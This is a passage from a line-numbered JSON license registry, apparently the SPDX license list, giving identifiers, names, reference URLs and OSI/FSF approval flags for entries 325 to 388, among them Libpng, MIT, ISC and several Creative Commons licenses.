4050 "isDeprecatedLicenseId": false,
4051 "detailsUrl": "https://spdx.org/licenses/Libpng.json",
4052 "referenceNumber": 325,
4053 "name": "libpng License",
4054 "licenseId": "Libpng",
4055 "seeAlso": [
4056 "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
4057 ],
4058 "isOsiApproved": false
4059 },
4060 {
4061 "reference": "https://spdx.org/licenses/CC-BY-NC-3.0.html",
4062 "isDeprecatedLicenseId": false,
4063 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0.json",
4064 "referenceNumber": 326,
4065 "name": "Creative Commons Attribution Non Commercial 3.0 Unported",
4066 "licenseId": "CC-BY-NC-3.0",
4067 "seeAlso": [
4068 "https://creativecommons.org/licenses/by-nc/3.0/legalcode"
4069 ],
4070 "isOsiApproved": false
4071 },
4072 {
4073 "reference": "https://spdx.org/licenses/CC-BY-NC-2.0.html",
4074 "isDeprecatedLicenseId": false,
4075 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.0.json",
4076 "referenceNumber": 327,
4077 "name": "Creative Commons Attribution Non Commercial 2.0 Generic",
4078 "licenseId": "CC-BY-NC-2.0",
4079 "seeAlso": [
4080 "https://creativecommons.org/licenses/by-nc/2.0/legalcode"
4081 ],
4082 "isOsiApproved": false
4083 },
4084 {
4085 "reference": "https://spdx.org/licenses/Unlicense.html",
4086 "isDeprecatedLicenseId": false,
4087 "detailsUrl": "https://spdx.org/licenses/Unlicense.json",
4088 "referenceNumber": 328,
4089 "name": "The Unlicense",
4090 "licenseId": "Unlicense",
4091 "seeAlso": [
4092 "https://unlicense.org/"
4093 ],
4094 "isOsiApproved": true,
4095 "isFsfLibre": true
4096 },
4097 {
4098 "reference": "https://spdx.org/licenses/LPL-1.0.html",
4099 "isDeprecatedLicenseId": false,
4100 "detailsUrl": "https://spdx.org/licenses/LPL-1.0.json",
4101 "referenceNumber": 329,
4102 "name": "Lucent Public License Version 1.0",
4103 "licenseId": "LPL-1.0",
4104 "seeAlso": [
4105 "https://opensource.org/licenses/LPL-1.0"
4106 ],
4107 "isOsiApproved": true
4108 },
4109 {
4110 "reference": "https://spdx.org/licenses/bzip2-1.0.5.html",
4111 "isDeprecatedLicenseId": false,
4112 "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.5.json",
4113 "referenceNumber": 330,
4114 "name": "bzip2 and libbzip2 License v1.0.5",
4115 "licenseId": "bzip2-1.0.5",
4116 "seeAlso": [
4117 "https://sourceware.org/bzip2/1.0.5/bzip2-manual-1.0.5.html",
4118 "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
4119 ],
4120 "isOsiApproved": false
4121 },
4122 {
4123 "reference": "https://spdx.org/licenses/Entessa.html",
4124 "isDeprecatedLicenseId": false,
4125 "detailsUrl": "https://spdx.org/licenses/Entessa.json",
4126 "referenceNumber": 331,
4127 "name": "Entessa Public License v1.0",
4128 "licenseId": "Entessa",
4129 "seeAlso": [
4130 "https://opensource.org/licenses/Entessa"
4131 ],
4132 "isOsiApproved": true
4133 },
4134 {
4135 "reference": "https://spdx.org/licenses/BSD-2-Clause-Patent.html",
4136 "isDeprecatedLicenseId": false,
4137 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Patent.json",
4138 "referenceNumber": 332,
4139 "name": "BSD-2-Clause Plus Patent License",
4140 "licenseId": "BSD-2-Clause-Patent",
4141 "seeAlso": [
4142 "https://opensource.org/licenses/BSDplusPatent"
4143 ],
4144 "isOsiApproved": true
4145 },
4146 {
4147 "reference": "https://spdx.org/licenses/ECL-2.0.html",
4148 "isDeprecatedLicenseId": false,
4149 "detailsUrl": "https://spdx.org/licenses/ECL-2.0.json",
4150 "referenceNumber": 333,
4151 "name": "Educational Community License v2.0",
4152 "licenseId": "ECL-2.0",
4153 "seeAlso": [
4154 "https://opensource.org/licenses/ECL-2.0"
4155 ],
4156 "isOsiApproved": true,
4157 "isFsfLibre": true
4158 },
4159 {
4160 "reference": "https://spdx.org/licenses/Crossword.html",
4161 "isDeprecatedLicenseId": false,
4162 "detailsUrl": "https://spdx.org/licenses/Crossword.json",
4163 "referenceNumber": 334,
4164 "name": "Crossword License",
4165 "licenseId": "Crossword",
4166 "seeAlso": [
4167 "https://fedoraproject.org/wiki/Licensing/Crossword"
4168 ],
4169 "isOsiApproved": false
4170 },
4171 {
4172 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.html",
4173 "isDeprecatedLicenseId": false,
4174 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.json",
4175 "referenceNumber": 335,
4176 "name": "Creative Commons Attribution Non Commercial No Derivatives 1.0 Generic",
4177 "licenseId": "CC-BY-NC-ND-1.0",
4178 "seeAlso": [
4179 "https://creativecommons.org/licenses/by-nd-nc/1.0/legalcode"
4180 ],
4181 "isOsiApproved": false
4182 },
4183 {
4184 "reference": "https://spdx.org/licenses/OCLC-2.0.html",
4185 "isDeprecatedLicenseId": false,
4186 "detailsUrl": "https://spdx.org/licenses/OCLC-2.0.json",
4187 "referenceNumber": 336,
4188 "name": "OCLC Research Public License 2.0",
4189 "licenseId": "OCLC-2.0",
4190 "seeAlso": [
4191 "http://www.oclc.org/research/activities/software/license/v2final.htm",
4192 "https://opensource.org/licenses/OCLC-2.0"
4193 ],
4194 "isOsiApproved": true
4195 },
4196 {
4197 "reference": "https://spdx.org/licenses/CECILL-1.1.html",
4198 "isDeprecatedLicenseId": false,
4199 "detailsUrl": "https://spdx.org/licenses/CECILL-1.1.json",
4200 "referenceNumber": 337,
4201 "name": "CeCILL Free Software License Agreement v1.1",
4202 "licenseId": "CECILL-1.1",
4203 "seeAlso": [
4204 "http://www.cecill.info/licences/Licence_CeCILL_V1.1-US.html"
4205 ],
4206 "isOsiApproved": false
4207 },
4208 {
4209 "reference": "https://spdx.org/licenses/CECILL-2.1.html",
4210 "isDeprecatedLicenseId": false,
4211 "detailsUrl": "https://spdx.org/licenses/CECILL-2.1.json",
4212 "referenceNumber": 338,
4213 "name": "CeCILL Free Software License Agreement v2.1",
4214 "licenseId": "CECILL-2.1",
4215 "seeAlso": [
4216 "http://www.cecill.info/licences/Licence_CeCILL_V2.1-en.html"
4217 ],
4218 "isOsiApproved": true
4219 },
4220 {
4221 "reference": "https://spdx.org/licenses/OGDL-Taiwan-1.0.html",
4222 "isDeprecatedLicenseId": false,
4223 "detailsUrl": "https://spdx.org/licenses/OGDL-Taiwan-1.0.json",
4224 "referenceNumber": 339,
4225 "name": "Taiwan Open Government Data License, version 1.0",
4226 "licenseId": "OGDL-Taiwan-1.0",
4227 "seeAlso": [
4228 "https://data.gov.tw/license"
4229 ],
4230 "isOsiApproved": false
4231 },
4232 {
4233 "reference": "https://spdx.org/licenses/Abstyles.html",
4234 "isDeprecatedLicenseId": false,
4235 "detailsUrl": "https://spdx.org/licenses/Abstyles.json",
4236 "referenceNumber": 340,
4237 "name": "Abstyles License",
4238 "licenseId": "Abstyles",
4239 "seeAlso": [
4240 "https://fedoraproject.org/wiki/Licensing/Abstyles"
4241 ],
4242 "isOsiApproved": false
4243 },
4244 {
4245 "reference": "https://spdx.org/licenses/libselinux-1.0.html",
4246 "isDeprecatedLicenseId": false,
4247 "detailsUrl": "https://spdx.org/licenses/libselinux-1.0.json",
4248 "referenceNumber": 341,
4249 "name": "libselinux public domain notice",
4250 "licenseId": "libselinux-1.0",
4251 "seeAlso": [
4252 "https://github.com/SELinuxProject/selinux/blob/master/libselinux/LICENSE"
4253 ],
4254 "isOsiApproved": false
4255 },
4256 {
4257 "reference": "https://spdx.org/licenses/ANTLR-PD.html",
4258 "isDeprecatedLicenseId": false,
4259 "detailsUrl": "https://spdx.org/licenses/ANTLR-PD.json",
4260 "referenceNumber": 342,
4261 "name": "ANTLR Software Rights Notice",
4262 "licenseId": "ANTLR-PD",
4263 "seeAlso": [
4264 "http://www.antlr2.org/license.html"
4265 ],
4266 "isOsiApproved": false
4267 },
4268 {
4269 "reference": "https://spdx.org/licenses/GPL-2.0-or-later.html",
4270 "isDeprecatedLicenseId": false,
4271 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-or-later.json",
4272 "referenceNumber": 343,
4273 "name": "GNU General Public License v2.0 or later",
4274 "licenseId": "GPL-2.0-or-later",
4275 "seeAlso": [
4276 "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
4277 "https://opensource.org/licenses/GPL-2.0"
4278 ],
4279 "isOsiApproved": true,
4280 "isFsfLibre": true
4281 },
4282 {
4283 "reference": "https://spdx.org/licenses/IPL-1.0.html",
4284 "isDeprecatedLicenseId": false,
4285 "detailsUrl": "https://spdx.org/licenses/IPL-1.0.json",
4286 "referenceNumber": 344,
4287 "name": "IBM Public License v1.0",
4288 "licenseId": "IPL-1.0",
4289 "seeAlso": [
4290 "https://opensource.org/licenses/IPL-1.0"
4291 ],
4292 "isOsiApproved": true,
4293 "isFsfLibre": true
4294 },
4295 {
4296 "reference": "https://spdx.org/licenses/MIT-enna.html",
4297 "isDeprecatedLicenseId": false,
4298 "detailsUrl": "https://spdx.org/licenses/MIT-enna.json",
4299 "referenceNumber": 345,
4300 "name": "enna License",
4301 "licenseId": "MIT-enna",
4302 "seeAlso": [
4303 "https://fedoraproject.org/wiki/Licensing/MIT#enna"
4304 ],
4305 "isOsiApproved": false
4306 },
4307 {
4308 "reference": "https://spdx.org/licenses/CPOL-1.02.html",
4309 "isDeprecatedLicenseId": false,
4310 "detailsUrl": "https://spdx.org/licenses/CPOL-1.02.json",
4311 "referenceNumber": 346,
4312 "name": "Code Project Open License 1.02",
4313 "licenseId": "CPOL-1.02",
4314 "seeAlso": [
4315 "http://www.codeproject.com/info/cpol10.aspx"
4316 ],
4317 "isOsiApproved": false
4318 },
4319 {
4320 "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.html",
4321 "isDeprecatedLicenseId": false,
4322 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.json",
4323 "referenceNumber": 347,
4324 "name": "Creative Commons Attribution Share Alike 3.0 Austria",
4325 "licenseId": "CC-BY-SA-3.0-AT",
4326 "seeAlso": [
4327 "https://creativecommons.org/licenses/by-sa/3.0/at/legalcode"
4328 ],
4329 "isOsiApproved": false
4330 },
4331 {
4332 "reference": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.html",
4333 "isDeprecatedLicenseId": true,
4334 "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.json",
4335 "referenceNumber": 348,
4336 "name": "GNU General Public License v3.0 w/GCC Runtime Library exception",
4337 "licenseId": "GPL-3.0-with-GCC-exception",
4338 "seeAlso": [
4339 "https://www.gnu.org/licenses/gcc-exception-3.1.html"
4340 ],
4341 "isOsiApproved": true
4342 },
4343 {
4344 "reference": "https://spdx.org/licenses/BSD-1-Clause.html",
4345 "isDeprecatedLicenseId": false,
4346 "detailsUrl": "https://spdx.org/licenses/BSD-1-Clause.json",
4347 "referenceNumber": 349,
4348 "name": "BSD 1-Clause License",
4349 "licenseId": "BSD-1-Clause",
4350 "seeAlso": [
4351 "https://svnweb.freebsd.org/base/head/include/ifaddrs.h?revision\u003d326823"
4352 ],
4353 "isOsiApproved": true
4354 },
4355 {
4356 "reference": "https://spdx.org/licenses/NTP-0.html",
4357 "isDeprecatedLicenseId": false,
4358 "detailsUrl": "https://spdx.org/licenses/NTP-0.json",
4359 "referenceNumber": 350,
4360 "name": "NTP No Attribution",
4361 "licenseId": "NTP-0",
4362 "seeAlso": [
4363 "https://github.com/tytso/e2fsprogs/blob/master/lib/et/et_name.c"
4364 ],
4365 "isOsiApproved": false
4366 },
4367 {
4368 "reference": "https://spdx.org/licenses/SugarCRM-1.1.3.html",
4369 "isDeprecatedLicenseId": false,
4370 "detailsUrl": "https://spdx.org/licenses/SugarCRM-1.1.3.json",
4371 "referenceNumber": 351,
4372 "name": "SugarCRM Public License v1.1.3",
4373 "licenseId": "SugarCRM-1.1.3",
4374 "seeAlso": [
4375 "http://www.sugarcrm.com/crm/SPL"
4376 ],
4377 "isOsiApproved": false
4378 },
4379 {
4380 "reference": "https://spdx.org/licenses/MIT.html",
4381 "isDeprecatedLicenseId": false,
4382 "detailsUrl": "https://spdx.org/licenses/MIT.json",
4383 "referenceNumber": 352,
4384 "name": "MIT License",
4385 "licenseId": "MIT",
4386 "seeAlso": [
4387 "https://opensource.org/licenses/MIT"
4388 ],
4389 "isOsiApproved": true,
4390 "isFsfLibre": true
4391 },
4392 {
4393 "reference": "https://spdx.org/licenses/OFL-1.1-RFN.html",
4394 "isDeprecatedLicenseId": false,
4395 "detailsUrl": "https://spdx.org/licenses/OFL-1.1-RFN.json",
4396 "referenceNumber": 353,
4397 "name": "SIL Open Font License 1.1 with Reserved Font Name",
4398 "licenseId": "OFL-1.1-RFN",
4399 "seeAlso": [
4400 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
4401 "https://opensource.org/licenses/OFL-1.1"
4402 ],
4403 "isOsiApproved": true
4404 },
4405 {
4406 "reference": "https://spdx.org/licenses/Watcom-1.0.html",
4407 "isDeprecatedLicenseId": false,
4408 "detailsUrl": "https://spdx.org/licenses/Watcom-1.0.json",
4409 "referenceNumber": 354,
4410 "name": "Sybase Open Watcom Public License 1.0",
4411 "licenseId": "Watcom-1.0",
4412 "seeAlso": [
4413 "https://opensource.org/licenses/Watcom-1.0"
4414 ],
4415 "isOsiApproved": true
4416 },
4417 {
4418 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.html",
4419 "isDeprecatedLicenseId": false,
4420 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.json",
4421 "referenceNumber": 355,
4422 "name": "Creative Commons Attribution-NonCommercial-ShareAlike 2.0 France",
4423 "licenseId": "CC-BY-NC-SA-2.0-FR",
4424 "seeAlso": [
4425 "https://creativecommons.org/licenses/by-nc-sa/2.0/fr/legalcode"
4426 ],
4427 "isOsiApproved": false
4428 },
4429 {
4430 "reference": "https://spdx.org/licenses/ODbL-1.0.html",
4431 "isDeprecatedLicenseId": false,
4432 "detailsUrl": "https://spdx.org/licenses/ODbL-1.0.json",
4433 "referenceNumber": 356,
4434 "name": "Open Data Commons Open Database License v1.0",
4435 "licenseId": "ODbL-1.0",
4436 "seeAlso": [
4437 "http://www.opendatacommons.org/licenses/odbl/1.0/",
4438 "https://opendatacommons.org/licenses/odbl/1-0/"
4439 ],
4440 "isOsiApproved": false,
4441 "isFsfLibre": true
4442 },
4443 {
4444 "reference": "https://spdx.org/licenses/FSFULLR.html",
4445 "isDeprecatedLicenseId": false,
4446 "detailsUrl": "https://spdx.org/licenses/FSFULLR.json",
4447 "referenceNumber": 357,
4448 "name": "FSF Unlimited License (with License Retention)",
4449 "licenseId": "FSFULLR",
4450 "seeAlso": [
4451 "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License#License_Retention_Variant"
4452 ],
4453 "isOsiApproved": false
4454 },
4455 {
4456 "reference": "https://spdx.org/licenses/OLDAP-1.3.html",
4457 "isDeprecatedLicenseId": false,
4458 "detailsUrl": "https://spdx.org/licenses/OLDAP-1.3.json",
4459 "referenceNumber": 358,
4460 "name": "Open LDAP Public License v1.3",
4461 "licenseId": "OLDAP-1.3",
4462 "seeAlso": [
4463 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003de5f8117f0ce088d0bd7a8e18ddf37eaa40eb09b1"
4464 ],
4465 "isOsiApproved": false
4466 },
4467 {
4468 "reference": "https://spdx.org/licenses/SSH-OpenSSH.html",
4469 "isDeprecatedLicenseId": false,
4470 "detailsUrl": "https://spdx.org/licenses/SSH-OpenSSH.json",
4471 "referenceNumber": 359,
4472 "name": "SSH OpenSSH license",
4473 "licenseId": "SSH-OpenSSH",
4474 "seeAlso": [
4475 "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/LICENCE#L10"
4476 ],
4477 "isOsiApproved": false
4478 },
4479 {
4480 "reference": "https://spdx.org/licenses/BSD-2-Clause.html",
4481 "isDeprecatedLicenseId": false,
4482 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause.json",
4483 "referenceNumber": 360,
4484 "name": "BSD 2-Clause \"Simplified\" License",
4485 "licenseId": "BSD-2-Clause",
4486 "seeAlso": [
4487 "https://opensource.org/licenses/BSD-2-Clause"
4488 ],
4489 "isOsiApproved": true
4490 },
4491 {
4492 "reference": "https://spdx.org/licenses/HPND.html",
4493 "isDeprecatedLicenseId": false,
4494 "detailsUrl": "https://spdx.org/licenses/HPND.json",
4495 "referenceNumber": 361,
4496 "name": "Historical Permission Notice and Disclaimer",
4497 "licenseId": "HPND",
4498 "seeAlso": [
4499 "https://opensource.org/licenses/HPND"
4500 ],
4501 "isOsiApproved": true,
4502 "isFsfLibre": true
4503 },
4504 {
4505 "reference": "https://spdx.org/licenses/Zimbra-1.3.html",
4506 "isDeprecatedLicenseId": false,
4507 "detailsUrl": "https://spdx.org/licenses/Zimbra-1.3.json",
4508 "referenceNumber": 362,
4509 "name": "Zimbra Public License v1.3",
4510 "licenseId": "Zimbra-1.3",
4511 "seeAlso": [
4512 "http://web.archive.org/web/20100302225219/http://www.zimbra.com/license/zimbra-public-license-1-3.html"
4513 ],
4514 "isOsiApproved": false,
4515 "isFsfLibre": true
4516 },
4517 {
4518 "reference": "https://spdx.org/licenses/Borceux.html",
4519 "isDeprecatedLicenseId": false,
4520 "detailsUrl": "https://spdx.org/licenses/Borceux.json",
4521 "referenceNumber": 363,
4522 "name": "Borceux license",
4523 "licenseId": "Borceux",
4524 "seeAlso": [
4525 "https://fedoraproject.org/wiki/Licensing/Borceux"
4526 ],
4527 "isOsiApproved": false
4528 },
4529 {
4530 "reference": "https://spdx.org/licenses/OLDAP-1.1.html",
4531 "isDeprecatedLicenseId": false,
4532 "detailsUrl": "https://spdx.org/licenses/OLDAP-1.1.json",
4533 "referenceNumber": 364,
4534 "name": "Open LDAP Public License v1.1",
4535 "licenseId": "OLDAP-1.1",
4536 "seeAlso": [
4537 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d806557a5ad59804ef3a44d5abfbe91d706b0791f"
4538 ],
4539 "isOsiApproved": false
4540 },
4541 {
4542 "reference": "https://spdx.org/licenses/OFL-1.0.html",
4543 "isDeprecatedLicenseId": false,
4544 "detailsUrl": "https://spdx.org/licenses/OFL-1.0.json",
4545 "referenceNumber": 365,
4546 "name": "SIL Open Font License 1.0",
4547 "licenseId": "OFL-1.0",
4548 "seeAlso": [
4549 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
4550 ],
4551 "isOsiApproved": false
4552 },
4553 {
4554 "reference": "https://spdx.org/licenses/NASA-1.3.html",
4555 "isDeprecatedLicenseId": false,
4556 "detailsUrl": "https://spdx.org/licenses/NASA-1.3.json",
4557 "referenceNumber": 366,
4558 "name": "NASA Open Source Agreement 1.3",
4559 "licenseId": "NASA-1.3",
4560 "seeAlso": [
4561 "http://ti.arc.nasa.gov/opensource/nosa/",
4562 "https://opensource.org/licenses/NASA-1.3"
4563 ],
4564 "isOsiApproved": true
4565 },
4566 {
4567 "reference": "https://spdx.org/licenses/VOSTROM.html",
4568 "isDeprecatedLicenseId": false,
4569 "detailsUrl": "https://spdx.org/licenses/VOSTROM.json",
4570 "referenceNumber": 367,
4571 "name": "VOSTROM Public License for Open Source",
4572 "licenseId": "VOSTROM",
4573 "seeAlso": [
4574 "https://fedoraproject.org/wiki/Licensing/VOSTROM"
4575 ],
4576 "isOsiApproved": false
4577 },
4578 {
4579 "reference": "https://spdx.org/licenses/MIT-0.html",
4580 "isDeprecatedLicenseId": false,
4581 "detailsUrl": "https://spdx.org/licenses/MIT-0.json",
4582 "referenceNumber": 368,
4583 "name": "MIT No Attribution",
4584 "licenseId": "MIT-0",
4585 "seeAlso": [
4586 "https://github.com/aws/mit-0",
4587 "https://romanrm.net/mit-zero",
4588 "https://github.com/awsdocs/aws-cloud9-user-guide/blob/master/LICENSE-SAMPLECODE"
4589 ],
4590 "isOsiApproved": true
4591 },
4592 {
4593 "reference": "https://spdx.org/licenses/ISC.html",
4594 "isDeprecatedLicenseId": false,
4595 "detailsUrl": "https://spdx.org/licenses/ISC.json",
4596 "referenceNumber": 369,
4597 "name": "ISC License",
4598 "licenseId": "ISC",
4599 "seeAlso": [
4600 "https://www.isc.org/licenses/",
4601 "https://www.isc.org/downloads/software-support-policy/isc-license/",
4602 "https://opensource.org/licenses/ISC"
4603 ],
4604 "isOsiApproved": true,
4605 "isFsfLibre": true
4606 },
4607 {
4608 "reference": "https://spdx.org/licenses/Unicode-DFS-2016.html",
4609 "isDeprecatedLicenseId": false,
4610 "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2016.json",
4611 "referenceNumber": 370,
4612 "name": "Unicode License Agreement - Data Files and Software (2016)",
4613 "licenseId": "Unicode-DFS-2016",
4614 "seeAlso": [
4615 "http://www.unicode.org/copyright.html"
4616 ],
4617 "isOsiApproved": true
4618 },
4619 {
4620 "reference": "https://spdx.org/licenses/BlueOak-1.0.0.html",
4621 "isDeprecatedLicenseId": false,
4622 "detailsUrl": "https://spdx.org/licenses/BlueOak-1.0.0.json",
4623 "referenceNumber": 371,
4624 "name": "Blue Oak Model License 1.0.0",
4625 "licenseId": "BlueOak-1.0.0",
4626 "seeAlso": [
4627 "https://blueoakcouncil.org/license/1.0.0"
4628 ],
4629 "isOsiApproved": false
4630 },
4631 {
4632 "reference": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.html",
4633 "isDeprecatedLicenseId": false,
4634 "detailsUrl": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.json",
4635 "referenceNumber": 372,
4636 "name": "Licence Libre du Québec – Réciprocité forte version 1.1",
4637 "licenseId": "LiLiQ-Rplus-1.1",
4638 "seeAlso": [
4639 "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-forte-liliq-r-v1-1/",
4640 "http://opensource.org/licenses/LiLiQ-Rplus-1.1"
4641 ],
4642 "isOsiApproved": true
4643 },
4644 {
4645 "reference": "https://spdx.org/licenses/NOSL.html",
4646 "isDeprecatedLicenseId": false,
4647 "detailsUrl": "https://spdx.org/licenses/NOSL.json",
4648 "referenceNumber": 373,
4649 "name": "Netizen Open Source License",
4650 "licenseId": "NOSL",
4651 "seeAlso": [
4652 "http://bits.netizen.com.au/licenses/NOSL/nosl.txt"
4653 ],
4654 "isOsiApproved": false,
4655 "isFsfLibre": true
4656 },
4657 {
4658 "reference": "https://spdx.org/licenses/SMLNJ.html",
4659 "isDeprecatedLicenseId": false,
4660 "detailsUrl": "https://spdx.org/licenses/SMLNJ.json",
4661 "referenceNumber": 374,
4662 "name": "Standard ML of New Jersey License",
4663 "licenseId": "SMLNJ",
4664 "seeAlso": [
4665 "https://www.smlnj.org/license.html"
4666 ],
4667 "isOsiApproved": false,
4668 "isFsfLibre": true
4669 },
4670 {
4671 "reference": "https://spdx.org/licenses/LGPL-3.0+.html",
4672 "isDeprecatedLicenseId": true,
4673 "detailsUrl": "https://spdx.org/licenses/LGPL-3.0+.json",
4674 "referenceNumber": 375,
4675 "name": "GNU Lesser General Public License v3.0 or later",
4676 "licenseId": "LGPL-3.0+",
4677 "seeAlso": [
4678 "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
4679 "https://opensource.org/licenses/LGPL-3.0"
4680 ],
4681 "isOsiApproved": true
4682 },
4683 {
4684 "reference": "https://spdx.org/licenses/CPAL-1.0.html",
4685 "isDeprecatedLicenseId": false,
4686 "detailsUrl": "https://spdx.org/licenses/CPAL-1.0.json",
4687 "referenceNumber": 376,
4688 "name": "Common Public Attribution License 1.0",
4689 "licenseId": "CPAL-1.0",
4690 "seeAlso": [
4691 "https://opensource.org/licenses/CPAL-1.0"
4692 ],
4693 "isOsiApproved": true,
4694 "isFsfLibre": true
4695 },
4696 {
4697 "reference": "https://spdx.org/licenses/PSF-2.0.html",
4698 "isDeprecatedLicenseId": false,
4699 "detailsUrl": "https://spdx.org/licenses/PSF-2.0.json",
4700 "referenceNumber": 377,
4701 "name": "Python Software Foundation License 2.0",
4702 "licenseId": "PSF-2.0",
4703 "seeAlso": [
4704 "https://opensource.org/licenses/Python-2.0"
4705 ],
4706 "isOsiApproved": false
4707 },
4708 {
4709 "reference": "https://spdx.org/licenses/RPL-1.5.html",
4710 "isDeprecatedLicenseId": false,
4711 "detailsUrl": "https://spdx.org/licenses/RPL-1.5.json",
4712 "referenceNumber": 378,
4713 "name": "Reciprocal Public License 1.5",
4714 "licenseId": "RPL-1.5",
4715 "seeAlso": [
4716 "https://opensource.org/licenses/RPL-1.5"
4717 ],
4718 "isOsiApproved": true
4719 },
4720 {
4721 "reference": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.html",
4722 "isDeprecatedLicenseId": true,
4723 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.json",
4724 "referenceNumber": 379,
4725 "name": "BSD 2-Clause FreeBSD License",
4726 "licenseId": "BSD-2-Clause-FreeBSD",
4727 "seeAlso": [
4728 "http://www.freebsd.org/copyright/freebsd-license.html"
4729 ],
4730 "isOsiApproved": false,
4731 "isFsfLibre": true
4732 },
4733 {
4734 "reference": "https://spdx.org/licenses/MIT-Modern-Variant.html",
4735 "isDeprecatedLicenseId": false,
4736 "detailsUrl": "https://spdx.org/licenses/MIT-Modern-Variant.json",
4737 "referenceNumber": 380,
4738 "name": "MIT License Modern Variant",
4739 "licenseId": "MIT-Modern-Variant",
4740 "seeAlso": [
4741 "https://fedoraproject.org/wiki/Licensing:MIT#Modern_Variants",
4742 "https://ptolemy.berkeley.edu/copyright.htm",
4743 "https://pirlwww.lpl.arizona.edu/resources/guide/software/PerlTk/Tixlic.html"
4744 ],
4745 "isOsiApproved": true
4746 },
4747 {
4748 "reference": "https://spdx.org/licenses/Nokia.html",
4749 "isDeprecatedLicenseId": false,
4750 "detailsUrl": "https://spdx.org/licenses/Nokia.json",
4751 "referenceNumber": 381,
4752 "name": "Nokia Open Source License",
4753 "licenseId": "Nokia",
4754 "seeAlso": [
4755 "https://opensource.org/licenses/nokia"
4756 ],
4757 "isOsiApproved": true,
4758 "isFsfLibre": true
4759 },
4760 {
4761 "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.html",
4762 "isDeprecatedLicenseId": false,
4763 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.json",
4764 "referenceNumber": 382,
4765 "name": "GNU Free Documentation License v1.1 only - no invariants",
4766 "licenseId": "GFDL-1.1-no-invariants-only",
4767 "seeAlso": [
4768 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
4769 ],
4770 "isOsiApproved": false
4771 },
4772 {
4773 "reference": "https://spdx.org/licenses/PDDL-1.0.html",
4774 "isDeprecatedLicenseId": false,
4775 "detailsUrl": "https://spdx.org/licenses/PDDL-1.0.json",
4776 "referenceNumber": 383,
4777 "name": "Open Data Commons Public Domain Dedication \u0026 License 1.0",
4778 "licenseId": "PDDL-1.0",
4779 "seeAlso": [
4780 "http://opendatacommons.org/licenses/pddl/1.0/",
4781 "https://opendatacommons.org/licenses/pddl/"
4782 ],
4783 "isOsiApproved": false
4784 },
4785 {
4786 "reference": "https://spdx.org/licenses/EUPL-1.0.html",
4787 "isDeprecatedLicenseId": false,
4788 "detailsUrl": "https://spdx.org/licenses/EUPL-1.0.json",
4789 "referenceNumber": 384,
4790 "name": "European Union Public License 1.0",
4791 "licenseId": "EUPL-1.0",
4792 "seeAlso": [
4793 "http://ec.europa.eu/idabc/en/document/7330.html",
4794 "http://ec.europa.eu/idabc/servlets/Doc027f.pdf?id\u003d31096"
4795 ],
4796 "isOsiApproved": false
4797 },
4798 {
4799 "reference": "https://spdx.org/licenses/CDDL-1.1.html",
4800 "isDeprecatedLicenseId": false,
4801 "detailsUrl": "https://spdx.org/licenses/CDDL-1.1.json",
4802 "referenceNumber": 385,
4803 "name": "Common Development and Distribution License 1.1",
4804 "licenseId": "CDDL-1.1",
4805 "seeAlso": [
4806 "http://glassfish.java.net/public/CDDL+GPL_1_1.html",
4807 "https://javaee.github.io/glassfish/LICENSE"
4808 ],
4809 "isOsiApproved": false
4810 },
4811 {
4812 "reference": "https://spdx.org/licenses/GFDL-1.3-only.html",
4813 "isDeprecatedLicenseId": false,
4814 "detailsUrl": "https://spdx.org/licenses/GFDL-1.3-only.json",
4815 "referenceNumber": 386,
4816 "name": "GNU Free Documentation License v1.3 only",
4817 "licenseId": "GFDL-1.3-only",
4818 "seeAlso": [
4819 "https://www.gnu.org/licenses/fdl-1.3.txt"
4820 ],
4821 "isOsiApproved": false,
4822 "isFsfLibre": true
4823 },
4824 {
4825 "reference": "https://spdx.org/licenses/OLDAP-2.6.html",
4826 "isDeprecatedLicenseId": false,
4827 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.6.json",
4828 "referenceNumber": 387,
4829 "name": "Open LDAP Public License v2.6",
4830 "licenseId": "OLDAP-2.6",
4831 "seeAlso": [
4832 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d1cae062821881f41b73012ba816434897abf4205"
4833 ],
4834 "isOsiApproved": false
4835 },
4836 {
4837 "reference": "https://spdx.org/licenses/JSON.html",
4838 "isDeprecatedLicenseId": false,
4839 "detailsUrl": "https://spdx.org/licenses/JSON.json",
4840 "referenceNumber": 388,
4841 "name": "JSON License",
4842 "licenseId": "JSON",
4843 "seeAlso": [
